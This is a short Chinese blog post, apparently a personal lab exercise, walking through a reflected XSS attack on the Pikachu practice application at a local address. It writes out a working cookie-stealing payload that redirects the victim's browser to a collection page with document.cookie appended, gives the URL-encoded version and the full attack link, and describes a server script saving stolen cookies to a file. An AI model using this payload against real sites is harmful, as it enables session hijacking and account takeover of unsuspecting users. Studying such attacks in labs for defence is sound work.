反射XSS——构造payload

用了那么多平台，今天想自己研究一下攻击过程

 

 

话不多说，先上受害者

显然这里可能存在XSS

 

用弹窗试了一下,果不其然

 

自己写了两行代码，实现获取URL里面的cookie参数，然后将cookie写入一个新的文件cookie.txt中

 

 

然后构造payload    <script> document.location='http://192.168.2.91/XSSCOOKIE/getcookie.php?cookie='+document.cookie</script>

document.cookie负责获取当前同源的cookie

document.location负责读取（访问）写好的文件，并携带上cookie参数

 

 

这里message携带的参数需要进行一次URL编码：#%3Cscript%3E%20document.location%3D%27http%3A%2F%2F192.168.2.91%2FXSSCOOKIE%2Fgetcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscript%3E

 

 

所以最后的成品链接就是这样：

http://192.168.2.91/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3E%20document.location%3D%27http%3A%2F%2F192.168.2.91%2FXSSCOOKIE%2Fgetcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscript%3E&submit=submit

 

 

最后访问了链接之后，活生生的cookie就已经写好在cookie.txt中了。